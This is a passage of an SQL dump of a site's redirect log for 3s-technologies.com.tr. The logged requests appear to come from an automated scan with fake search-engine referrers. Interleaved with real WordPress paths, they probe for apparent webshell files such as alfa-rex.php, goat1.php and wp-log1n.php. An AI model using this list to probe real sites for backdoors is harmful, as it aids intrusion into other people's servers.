00:00:00',301),(53265,'http://3s-technologies.com.tr/en/wp-includes/l10n/class-wp-translation-file.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:53','0000-00-00 00:00:00',301),(53266,'http://3s-technologies.com.tr/en/wp-includes/l10n/class-wp-translations.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:22:54','0000-00-00 00:00:00',301),(53267,'http://3s-technologies.com.tr/en/wp-includes/l10n/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:22:55','0000-00-00 00:00:00',301),(53268,'http://3s-technologies.com.tr/en/wp-includes/link-template.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:22:56','0000-00-00 00:00:00',301),(53269,'http://3s-technologies.com.tr/en/wp-includes/load.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:22:57','0000-00-00 00:00:00',301),(53270,'http://3s-technologies.com.tr/en/wp-includes/locale.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:22:58','0000-00-00 00:00:00',301),(53271,'http://3s-technologies.com.tr/en/wp-includes/media-template.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:23:00','0000-00-00 00:00:00',301),(53272,'http://3s-technologies.com.tr/en/wp-includes/media.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:23:00','0000-00-00 00:00:00',301),(53273,'http://3s-technologies.com.tr/en/wp-includes/meta.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:01','0000-00-00 00:00:00',301),(53274,'http://3s-technologies.com.tr/en/wp-includes/ms-blogs.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:02','0000-00-00 00:00:00',301),(53275,'http://3s-technologies.com.tr/en/wp-includes/ms-default-constants.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:23:03','0000-00-00 00:00:00',301),(53276,'http://3s-technologies.com.tr/en/wp-includes/ms-default-filters.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:04','0000-00-00 00:00:00',301),(53277,'http://3s-technologies.com.tr/en/wp-includes/ms-deprecated.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:23:05','0000-00-00 00:00:00',301),(53278,'http://3s-technologies.com.tr/en/wp-includes/ms-files.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:06','0000-00-00 00:00:00',301),(53279,'http://3s-technologies.com.tr/en/wp-includes/ms-functions.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:06','0000-00-00 00:00:00',301),(53280,'http://3s-technologies.com.tr/en/wp-includes/ms-load.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:07','0000-00-00 00:00:00',301),(53281,'http://3s-technologies.com.tr/en/wp-includes/ms-network.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:23:08','0000-00-00 00:00:00',301),(53282,'http://3s-technologies.com.tr/en/wp-includes/ms-settings.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:09','0000-00-00 00:00:00',301),(53283,'http://3s-technologies.com.tr/en/wp-includes/ms-site.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:23:10','0000-00-00 00:00:00',301),(53284,'http://3s-technologies.com.tr/en/wp-includes/nav-menu-template.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:11','0000-00-00 00:00:00',301),(53285,'http://3s-technologies.com.tr/en/wp-includes/nav-menu.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:12','0000-00-00 00:00:00',301),(53286,'http://3s-technologies.com.tr/en/wp-includes/networks.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:12','0000-00-00 00:00:00',301),(53287,'http://3s-technologies.com.tr/en/wp-includes/options.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:14','0000-00-00 00:00:00',301),(53288,'http://3s-technologies.com.tr/en/wp-includes/php-compat/readonly.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:23:15','0000-00-00 00:00:00',301),(53289,'http://3s-technologies.com.tr/en/wp-includes/pluggable-deprecated.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:16','0000-00-00 00:00:00',301),(53290,'http://3s-technologies.com.tr/en/wp-includes/pluggable.php',NULL,'https://www.yahoo.com/','',4,0,'2025-12-20 05:23:17','0000-00-00 00:00:00',301),(53291,'http://3s-technologies.com.tr/en/wp-includes/plugin.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:17','0000-00-00 00:00:00',301),(53292,'http://3s-technologies.com.tr/en/wp-includes/plugins.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:18','0000-00-00 00:00:00',301),(53293,'http://3s-technologies.com.tr/en/wp-includes/js/thickbox/thickbox.php',NULL,'https://www.google.com/','',28,0,'2025-12-20 05:23:19','0000-00-00 00:00:00',301),(53294,'http://3s-technologies.com.tr/en/goat1.php',NULL,'https://www.google.fr/','',3,0,'2025-12-20 05:23:20','0000-00-00 00:00:00',301),(53295,'http://3s-technologies.com.tr/en/wp-includes/certificates/index.php',NULL,'https://www.google.com/','',7,0,'2025-12-20 05:23:21','0000-00-00 00:00:00',301),(53296,'http://3s-technologies.com.tr/en/wp-includes/pomo/alfa-rex.php',NULL,'https://www.bing.com/','',5,0,'2025-12-20 05:23:22','0000-00-00 00:00:00',301),(53297,'http://3s-technologies.com.tr/en/wp-includes/pomo/entry.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:23:23','0000-00-00 00:00:00',301),(53298,'http://3s-technologies.com.tr/en/wp-includes/pomo/mo.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:23:24','0000-00-00 00:00:00',301),(53299,'http://3s-technologies.com.tr/en/wp-includes/pomo/plural-forms.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:23:25','0000-00-00 00:00:00',301),(53300,'http://3s-technologies.com.tr/en/wp-includes/pomo/po.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:23:26','0000-00-00 00:00:00',301),(53301,'http://3s-technologies.com.tr/en/wp-includes/pomo/streams.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:27','0000-00-00 00:00:00',301),(53302,'http://3s-technologies.com.tr/en/wp-includes/pomo/translations.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:23:28','0000-00-00 00:00:00',301),(53303,'http://3s-technologies.com.tr/en/wp-includes/post-formats.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:28','0000-00-00 00:00:00',301),(53304,'http://3s-technologies.com.tr/en/wp-includes/post-template.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:23:29','0000-00-00 00:00:00',301),(53305,'http://3s-technologies.com.tr/en/wp-includes/post-thumbnail-template.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:30','0000-00-00 00:00:00',301),(53306,'http://3s-technologies.com.tr/en/wp-includes/product.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:23:32','0000-00-00 00:00:00',301),(53307,'http://3s-technologies.com.tr/en/wp-includes/query.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:33','0000-00-00 00:00:00',301),(53308,'http://3s-technologies.com.tr/en/wp-includes/registration-functions.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:34','0000-00-00 00:00:00',301),(53309,'http://3s-technologies.com.tr/en/wp-includes/registration.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:23:35','0000-00-00 00:00:00',301),(53310,'http://3s-technologies.com.tr/en/wp-includes/rest-api.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:36','0000-00-00 00:00:00',301),(53311,'http://3s-technologies.com.tr/en/wp-includes/rest-api/alfa-rex.php',NULL,'https://www.google.fr/','',5,0,'2025-12-20 05:23:37','0000-00-00 00:00:00',301),(53312,'http://3s-technologies.com.tr/en/wp-includes/rest-api/class-wp-rest-request.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:38','0000-00-00 00:00:00',301),(53313,'http://3s-technologies.com.tr/en/wp-includes/rest-api/class-wp-rest-response.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:39','0000-00-00 00:00:00',301),(53314,'http://3s-technologies.com.tr/en/wp-includes/rest-api/class-wp-rest-server.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:40','0000-00-00 00:00:00',301),(53315,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:23:40','0000-00-00 00:00:00',301),(53316,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:41','0000-00-00 00:00:00',301),(53317,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:42','0000-00-00 00:00:00',301),(53318,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:43','0000-00-00 00:00:00',301),(53319,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:44','0000-00-00 00:00:00',301),(53320,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:45','0000-00-00 00:00:00',301),(53321,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:23:46','0000-00-00 00:00:00',301),(53322,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-block-patterns-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:23:47','0000-00-00 00:00:00',301),(53323,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:48','0000-00-00 00:00:00',301),(53324,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:23:49','0000-00-00 00:00:00',301),(53325,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:23:50','0000-00-00 00:00:00',301),(53326,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:23:50','0000-00-00 00:00:00',301),(53327,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-controller.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:23:51','0000-00-00 00:00:00',301),(53328,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-edit-site-export-controller.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:23:52','0000-00-00 00:00:00',301),(53329,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-font-collections-controller.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:23:53','0000-00-00 00:00:00',301),(53330,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-font-faces-controller.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:23:54','0000-00-00 00:00:00',301),(53331,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-font-families-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:55','0000-00-00 00:00:00',301),(53332,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-global-styles-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:23:56','0000-00-00 00:00:00',301),(53333,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-global-styles-revisions-controller.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:23:56','0000-00-00 00:00:00',301),(53334,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-menu-items-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:23:57','0000-00-00 00:00:00',301),(53335,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-menu-locations-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:23:58','0000-00-00 00:00:00',301),(53336,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-menus-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:23:59','0000-00-00 00:00:00',301),(53337,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-navigation-fallback-controller.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:00','0000-00-00 00:00:00',301),(53338,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-pattern-directory-controller.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:24:01','0000-00-00 00:00:00',301),(53339,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:02','0000-00-00 00:00:00',301),(53340,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:02','0000-00-00 00:00:00',301),(53341,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:03','0000-00-00 00:00:00',301),(53342,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:04','0000-00-00 00:00:00',301),(53343,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:05','0000-00-00 00:00:00',301),(53344,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:06','0000-00-00 00:00:00',301),(53345,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:06','0000-00-00 00:00:00',301),(53346,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:07','0000-00-00 00:00:00',301),(53347,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:08','0000-00-00 00:00:00',301),(53348,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:09','0000-00-00 00:00:00',301),(53349,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-template-autosaves-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:10','0000-00-00 00:00:00',301),(53350,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-template-revisions-controller.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:24:10','0000-00-00 00:00:00',301),(53351,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:11','0000-00-00 00:00:00',301),(53352,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:12','0000-00-00 00:00:00',301),(53353,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:13','0000-00-00 00:00:00',301),(53354,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-url-details-controller.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:14','0000-00-00 00:00:00',301),(53355,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:15','0000-00-00 00:00:00',301),(53356,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:24:16','0000-00-00 00:00:00',301),(53357,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:24:17','0000-00-00 00:00:00',301),(53358,'http://3s-technologies.com.tr/en/wp-includes/rest-api/endpoints/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:24:17','0000-00-00 00:00:00',301),(53359,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:24:18','0000-00-00 00:00:00',301),(53360,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:19','0000-00-00 00:00:00',301),(53361,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:20','0000-00-00 00:00:00',301),(53362,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:21','0000-00-00 00:00:00',301),(53363,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:24:22','0000-00-00 00:00:00',301),(53364,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:23','0000-00-00 00:00:00',301),(53365,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:23','0000-00-00 00:00:00',301),(53366,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:24:24','0000-00-00 00:00:00',301),(53367,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:24:25','0000-00-00 00:00:00',301),(53368,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:26','0000-00-00 00:00:00',301),(53369,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:24:27','0000-00-00 00:00:00',301),(53370,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:28','0000-00-00 00:00:00',301),(53371,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search/class-wp-rest-search-handler.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:24:29','0000-00-00 00:00:00',301),(53372,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:30','0000-00-00 00:00:00',301),(53373,'http://3s-technologies.com.tr/en/wp-includes/rest-api/search/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:30','0000-00-00 00:00:00',301),(53374,'http://3s-technologies.com.tr/en/wp-includes/rest-api/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:31','0000-00-00 00:00:00',301),(53375,'http://3s-technologies.com.tr/en/wp-includes/revision.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:32','0000-00-00 00:00:00',301),(53376,'http://3s-technologies.com.tr/en/wp-includes/rewrite.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:33','0000-00-00 00:00:00',301),(53377,'http://3s-technologies.com.tr/en/wp-includes/robots-template.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:34','0000-00-00 00:00:00',301),(53378,'http://3s-technologies.com.tr/en/wp-includes/rss-functions.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:24:34','0000-00-00 00:00:00',301),(53379,'http://3s-technologies.com.tr/en/wp-includes/rss.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:24:35','0000-00-00 00:00:00',301),(53380,'http://3s-technologies.com.tr/en/wp-includes/script-loader.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:36','0000-00-00 00:00:00',301),(53381,'http://3s-technologies.com.tr/en/wp-includes/script-modules.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:37','0000-00-00 00:00:00',301),(53382,'http://3s-technologies.com.tr/en/wp-includes/session.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:38','0000-00-00 00:00:00',301),(53383,'http://3s-technologies.com.tr/en/wp-includes/shortcodes.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:24:39','0000-00-00 00:00:00',301),(53384,'http://3s-technologies.com.tr/en/wp-includes/sitemaps.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:24:39','0000-00-00 00:00:00',301),(53385,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/alfa-rex.php',NULL,'https://duckduckgo.com/','',5,0,'2025-12-20 05:24:40','0000-00-00 00:00:00',301),(53386,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/class-wp-sitemaps-index.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:41','0000-00-00 00:00:00',301),(53387,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/class-wp-sitemaps-provider.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:24:42','0000-00-00 00:00:00',301),(53388,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/class-wp-sitemaps-registry.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:43','0000-00-00 00:00:00',301),(53389,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/class-wp-sitemaps-renderer.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:43','0000-00-00 00:00:00',301),(53390,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:45','0000-00-00 00:00:00',301),(53391,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/class-wp-sitemaps.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:47','0000-00-00 00:00:00',301),(53392,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/providers/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:24:47','0000-00-00 00:00:00',301),(53393,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/providers/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:48','0000-00-00 00:00:00',301),(53394,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/providers/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:49','0000-00-00 00:00:00',301),(53395,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/about.php',NULL,'https://www.google.co.uk/','',5,0,'2025-12-20 05:24:50','0000-00-00 00:00:00',301),(53396,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/alfa-rex.php',NULL,'https://www.google.co.uk/','',5,0,'2025-12-20 05:24:51','0000-00-00 00:00:00',301),(53397,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/lib/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:24:52','0000-00-00 00:00:00',301),(53398,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/lib/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:24:53','0000-00-00 00:00:00',301),(53399,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/lib/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:53','0000-00-00 00:00:00',301),(53400,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/chacha20/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:24:54','0000-00-00 00:00:00',301),(53401,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/chacha20/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:55','0000-00-00 00:00:00',301),(53402,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/chacha20/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:24:56','0000-00-00 00:00:00',301),(53403,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/curve25519/wp-log1n.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:24:57','0000-00-00 00:00:00',301),(53404,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/poly1305/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:24:58','0000-00-00 00:00:00',301),(53405,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/poly1305/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:24:59','0000-00-00 00:00:00',301),(53406,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/poly1305/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:00','0000-00-00 00:00:00',301),(53407,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:01','0000-00-00 00:00:00',301),(53408,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:25:01','0000-00-00 00:00:00',301),(53409,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/core/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:02','0000-00-00 00:00:00',301),(53410,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:25:03','0000-00-00 00:00:00',301),(53411,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:04','0000-00-00 00:00:00',301),(53412,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/namespaced/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:05','0000-00-00 00:00:00',301),(53413,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/aes/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:25:06','0000-00-00 00:00:00',301),(53414,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/aes/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:07','0000-00-00 00:00:00',301),(53415,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/aes/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:08','0000-00-00 00:00:00',301),(53416,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/base64/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:09','0000-00-00 00:00:00',301),(53417,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/base64/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:09','0000-00-00 00:00:00',301),(53418,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/base64/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:10','0000-00-00 00:00:00',301),(53419,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/chacha20/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:25:11','0000-00-00 00:00:00',301),(53420,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/chacha20/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:12','0000-00-00 00:00:00',301),(53421,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/chacha20/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:13','0000-00-00 00:00:00',301),(53422,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/secretstream/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:14','0000-00-00 00:00:00',301),(53423,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/secretstream/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:15','0000-00-00 